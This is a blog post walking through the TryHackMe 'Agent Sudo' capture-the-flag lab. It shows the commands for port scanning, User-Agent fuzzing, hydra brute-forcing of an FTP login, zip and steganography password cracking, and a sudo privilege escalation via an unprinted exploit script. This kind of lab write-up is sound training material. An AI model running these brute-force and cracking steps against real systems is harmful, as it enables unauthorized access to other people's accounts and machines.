DEV Community

william-barros-costa
william-barros-costa

Posted on

TryHackMe - Agent Sudo

Recon

Nmap

As usual we start with nmap

sudo nmap -sV -A -T4 10.10.227.114 -oN nmap_results.txt
"PORT   STATE SERVICE VERSION
21/tcp open  ftp     vsftpd 3.0.3
22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 ef1f5d04d47795066072ecf058f2cc07 (RSA)
|   256 5e02d19ac4e7430662c19e25848ae7ea (ECDSA)
|_  256 2d005cb9fda8c8d880e3924f8b4f18e2 (ED25519)
80/tcp open  http    Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Annoucement"
Enter fullscreen mode Exit fullscreen mode

Here we notice we have a ftp, ssh and http server.

HTTP server

Homepage

In this page we discover we need the codenames/usernames to navigate the server. One of the names should start with R.

Homepage

Robots

No information can be extracted from the robots.txt page.

Robots

FTP

We try to login with anonymous but we do not succeed

Anonymous FTP

Codenames

Since we know K is a codename we should try every letter of the alphabet

echo "A
B
C
D
E
F
G
H
I
J
K
L
M
N
O
P
Q
R
S
T
U
V
W
X
Y
Z" > alphabet.txt
ffuf -w ./alphabet.txt -u http://10.10.201.112 -H "User-Agent: FUZZ" -fc 200 -fs 218 -fmode and -o ffuf_results.txt
# We notice User-Agent: C and R have a different page
curl -A "C" -L http://10.10.201.112:80/ 
"Attention chris, <br><br>

Do you still remember our deal? Please tell agent J about the stuff ASAP. Also, change your god damn password, is weak! <br><br>

From,<br>
Agent R"
curl -A "R" -L http://10.10.201.112:80/ 
"What are you doing! Are you one of the 25 employees? If not, I going to report this incident
<!DocType html>
<html>
<head>
        <title>Annoucement</title>
</head>

<body>
<p>
        Dear agents,
        <br><br>
        Use your own <b>codename</b> as user-agent to access the site.
        <br><br>
        From,<br>
        Agent R
</p>
</body>
</html>"
Enter fullscreen mode Exit fullscreen mode

Note: As a default I always try to filter by size and status code. The response might be another size or the code might be another (in this case it was a redirect). We also use -L on curl to allow it to follow redirects.

We found there is an Agent C, also known as chris.

FTP Server

We can try to bruteforce

hydra -t 32 -l chris -P /usr/share/wordlists/rockyou.txt 10.10.201.112 ftp -I -o hydra_results.txt
"Hydra v9.5 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2023-09-17 15:48:41
[DATA] max 32 tasks per 1 server, overall 32 tasks, 14344399 login tries (l:1/p:14344399), ~448263 tries per task
[DATA] attacking ftp://10.10.201.112:21/
[21][ftp] host: 10.10.201.112   login: chris   password: <password>
"
Enter fullscreen mode Exit fullscreen mode

We can now enter the ftp

ftp 10.10.201.112
# chris
# <password>
ls
"-rw-r--r--    1 0        0             217 Oct 29  2019 To_agentJ.txt
-rw-r--r--    1 0        0           33143 Oct 29  2019 cute-alien.jpg
-rw-r--r--    1 0        0           34842 Oct 29  2019 cutie.png"
get To_agentJ.txt
get cute-alien.jpg
get cutie.png
exit
cat To_agentJ.txt
"Dear agent J,

All these alien like photos are fake! Agent R stored the real picture inside your directory. Your login password is somehow stored in the fake picture. It shouldn't be a problem for you.

From,
Agent C"
Enter fullscreen mode Exit fullscreen mode

We use binwalk to extract extra content information from images

binwalk -e cutie.png
binwalk -e cute_alient.jpg
cd _cutie.png.extracted
ls
"365  365.zlib  8702.zip  To_agentR.txt"
cat To_agentR.txt
""
zip2john 8702.zip > hash.txt
john --wordlist=/usr/share/wordlists/rockyou.txt hash.txt
"<password>            (8702.zip/To_agentR.txt)"
7z e 8702.zip
cat To_agentR.txt
"Agent C,

We need to send the picture to '<base64>' as soon as possible!

By,
Agent R
"

# Stegseek is a binary to extract hidden data from files.
stegseek cute-alien.jpg /usr/share/wordlists/rockyou.txt
cat cute-alien.jpg.out
"
Hi james,

Glad you find this message. Your login password is <password>

Don't ask me why the password look cheesy, ask agent R who set this password for you.

Your buddy,
chris
"
Enter fullscreen mode Exit fullscreen mode

With the files explored we can now login through ssh

Entering Machine 

ssh james@10.10.201.112
ls
"Alien_autospy.jpg  user_flag.txt"
cat user_flag.txt
sudo -l 
"Matching Defaults entries for james on agent-sudo:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User james may run the following commands on agent-sudo:
    (ALL, !root) /bin/bash"
Enter fullscreen mode Exit fullscreen mode

We query (ALL, !root) /bin/bash and discover we have an exploit for it.

Privilege Escalation 

python3 exploit.py
# We are now root
cat /root/root.txt
"
To Mr.hacker,

Congratulation on rooting this box. This box was designed for TryHackMe. Tips, always update your machine. 

Your flag is 
<flag>

By,
<Agent-R> a.k.a Agent R
"
Enter fullscreen mode Exit fullscreen mode

Kanelao

Top comments (0)

Read next

codewithved profile image

What is Keda, and how can you use it within your cluster to scale your application?

CodeWithVed -

mahhbubferdous profile image

Understanding Virtual Private Cloud (VPC)

Mahbub Ferdous Bijoy -

ashley_obano_71cd63fedc66 profile image

Setting Up Django and Building a Poll App: My Last Two Weeks of Work

Ashley Obano -

mahhbubferdous profile image

DNS Resolution and TCP Handshake: A Comprehensive Guide

Mahbub Ferdous Bijoy -